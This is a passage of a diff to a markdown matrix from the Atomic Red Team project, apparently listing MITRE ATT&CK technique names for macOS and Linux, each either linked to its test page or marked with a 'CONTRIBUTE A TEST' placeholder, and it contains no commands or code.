[CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| | | [Local Account](../../T1136.001/T1136.001.md) | [Plist Modification](../../T1547.011/T1547.011.md) | [Hidden Users](../../T1564.002/T1564.002.md) | Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Connections Discovery](../../T1049/T1049.md) | | Web Portal Capture [CONTRIBUTE A 
TEST](https://atomicredteam.io/contributing) | | Mail Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| | | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Process Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hidden Window [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Owner/User Discovery](../../T1033/T1033.md) | | | | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Stop [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| | | [Logon Script (Mac)](../../T1037.002/T1037.002.md) | [Rc.common](../../T1037.004/T1037.004.md) | Hide Artifacts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| | | [Plist Modification](../../T1547.011/T1547.011.md) | [Re-opened Applications](../../T1547.007/T1547.007.md) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Unsecured Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) | -| | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Impair Command History 
Logging](../../T1562.003/T1562.003.md) | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| | | [Rc.common](../../T1037.004/T1037.004.md) | [Setuid and Setgid](../../T1548.001/T1548.001.md) | Impair Defenses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Non-Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | | [Re-opened Applications](../../T1547.007/T1547.007.md) | [Startup Items](../../T1037.005/T1037.005.md) | Indicator Blocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | [Non-Standard Port](../../T1571/T1571.md) | | -| | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | One-Way Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | | [SSH Authorized Keys](../../T1098.004/T1098.004.md) | [Trap](../../T1546.005/T1546.005.md) | Indicator Removal on Host [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Install Root Certificate](../../T1553.004/T1553.004.md) | | | | | | Protocol Impersonation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | | Server Software Component [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Invalid Code Signature [CONTRIBUTE A 
TEST](https://atomicredteam.io/contributing) | | | | | | Protocol Tunneling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | | [Startup Items](../../T1037.005/T1037.005.md) | | LC_MAIN Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) | | | | | | Remote Access Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | | [Trap](../../T1546.005/T1546.005.md) | | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | [Standard Encoding](../../T1132.001/T1132.001.md) | | -| | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Masquerading [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | | Web Shell [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Symmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | | | | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | | | | [Obfuscated Files or Information](../../T1027/T1027.md) | | | | | | [Web Protocols](../../T1071.001/T1071.001.md) | | -| | | | | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppleScript](../../T1059.002/T1059.002.md) | Account 
Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Exfiltration [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Access Removal [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Binary Padding](../../T1027.001/T1027.001.md) | [Bash History](../../T1552.003/T1552.003.md) | Application Window Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive Collected Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Transfer Size Limits](../../T1030/T1030.md) | Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Boot or Logon 
Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Command History](../../T1070.003/T1070.003.md) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Extensions](../../T1176/T1176.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) | +| Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | 
[Cron](../../T1053.003/T1053.003.md) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credentials In Files](../../T1552.001/T1552.001.md) | Domain Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | JavaScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Code Signing Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credentials from Password Stores [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [File and Directory Discovery](../../T1083/T1083.md) | SSH [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Audio Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launchctl](../../T1569.001/T1569.001.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Compile After Delivery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credentials from Web 
Browsers](../../T1555.003/T1555.003.md) | Internet Connection Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launchd](../../T1053.004/T1053.004.md) | [Cron](../../T1053.003/T1053.003.md) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Account](../../T1087.001/T1087.001.md) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clipboard Data](../../T1115/T1115.md) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious File [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic Linker Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Deobfuscate/Decode Files or Information [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Forge Web Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Groups](../../T1069.001/T1069.001.md) | VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | 
Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disable or Modify System Firewall [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | [Network Service Scanning](../../T1046/T1046.md) | | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Spearphishing Attachment [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Native API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Emond](../../T1546.014/T1546.014.md) | [Disable or Modify Tools](../../T1562.001/T1562.001.md) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Share Discovery](../../T1135/T1135.md) | | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| 
Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Python [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Keychain](../../T1555.001/T1555.001.md) | [Network Sniffing](../../T1040/T1040.md) | | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic Linker Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Keylogging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Policy Discovery](../../T1201/T1201.md) | | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Emond](../../T1546.014/T1546.014.md) | Hijack Execution Flow [CONTRIBUTE A 
TEST](https://atomicredteam.io/contributing) | Dynamic Linker Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [GUI Input Capture](../../T1056.002/T1056.002.md) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Encrypted Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Firmware Corruption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Kernel Modules and Extensions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Permission Groups Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Inhibit System Recovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Source [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | [Process 
Discovery](../../T1057/T1057.md) | | Keylogging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| | System Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Kernel Modules and Extensions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launch Agent](../../T1543.001/T1543.001.md) | Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Credential Dumping [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Remote System Discovery](../../T1018/T1018.md) | | [Local Data Staging](../../T1074.001/T1074.001.md) | | Fast Flux DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| | [Unix Shell](../../T1059.004/T1059.004.md) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launch Daemon](../../T1543.004/T1543.004.md) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Cracking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Software Discovery](../../T1518.001/T1518.001.md) | | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| | User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launch Agent](../../T1543.001/T1543.001.md) | [Launchd](../../T1053.004/T1053.004.md) | [File Deletion](../../T1070.004/T1070.004.md) | Password Guessing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Software Discovery](../../T1518/T1518.md) | | Remote Data Staging [CONTRIBUTE A 
TEST](https://atomicredteam.io/contributing) | | [Ingress Tool Transfer](../../T1105/T1105.md) | Reflection Amplification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| | Visual Basic [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launch Daemon](../../T1543.004/T1543.004.md) | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Managers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Checks](../../T1497.001/T1497.001.md) | | [Screen Capture](../../T1113/T1113.md) | | [Internal Proxy](../../T1090.001/T1090.001.md) | [Resource Hijacking](../../T1496/T1496.md) | +| | | [Launchd](../../T1053.004/T1053.004.md) | [Logon Script (Mac)](../../T1037.002/T1037.002.md) | [Gatekeeper Bypass](../../T1553.001/T1553.001.md) | Password Spraying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Information Discovery](../../T1082/T1082.md) | | Video Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| | | [Local Account](../../T1136.001/T1136.001.md) | [Plist Modification](../../T1547.011/T1547.011.md) | Hidden File System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | System Location Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Mail Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| | | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Process Injection 
[CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hidden Files and Directories](../../T1564.001/T1564.001.md) | [Private Keys](../../T1552.004/T1552.004.md) | [System Network Configuration Discovery](../../T1016/T1016.md) | | | | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Stop [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| | | [Logon Script (Mac)](../../T1037.002/T1037.002.md) | [RC Scripts](../../T1037.004/T1037.004.md) | [Hidden Users](../../T1564.002/T1564.002.md) | Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Connections Discovery](../../T1049/T1049.md) | | | | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| | | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Re-opened Applications](../../T1547.007/T1547.007.md) | Hidden Window [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Owner/User Discovery](../../T1033/T1033.md) | | | | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) | +| | | [Plist Modification](../../T1547.011/T1547.011.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hide Artifacts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| | | Pluggable Authentication Modules 
[CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Setuid and Setgid](../../T1548.001/T1548.001.md) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Unsecured Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Non-Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Startup Items](../../T1037.005/T1037.005.md) | [Impair Command History Logging](../../T1562.003/T1562.003.md) | Web Cookies [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | [Non-Standard Port](../../T1571/T1571.md) | | +| | | [RC Scripts](../../T1037.004/T1037.004.md) | [Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | Impair Defenses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | One-Way Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | | [Re-opened Applications](../../T1547.007/T1547.007.md) | [Trap](../../T1546.005/T1546.005.md) | Indicator Blocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Unix Shell Configuration Modification](../../T1546.004/T1546.004.md) | Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Protocol Impersonation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | | [SSH Authorized Keys](../../T1098.004/T1098.004.md) | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Indicator Removal on 
Host [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Protocol Tunneling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Install Root Certificate](../../T1553.004/T1553.004.md) | | | | | | Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | | Server Software Component [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Invalid Code Signature [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Remote Access Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | | [Startup Items](../../T1037.005/T1037.005.md) | | LC_MAIN Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | [Standard Encoding](../../T1132.001/T1132.001.md) | | +| | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) | | | | | | Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | | [Trap](../../T1546.005/T1546.005.md) | | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Symmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | | [Unix Shell Configuration Modification](../../T1546.004/T1546.004.md) | | Masquerading [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | [Web Protocols](../../T1071.001/T1071.001.md) | | +| | | Web Shell [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Modify Authentication Process [CONTRIBUTE A 
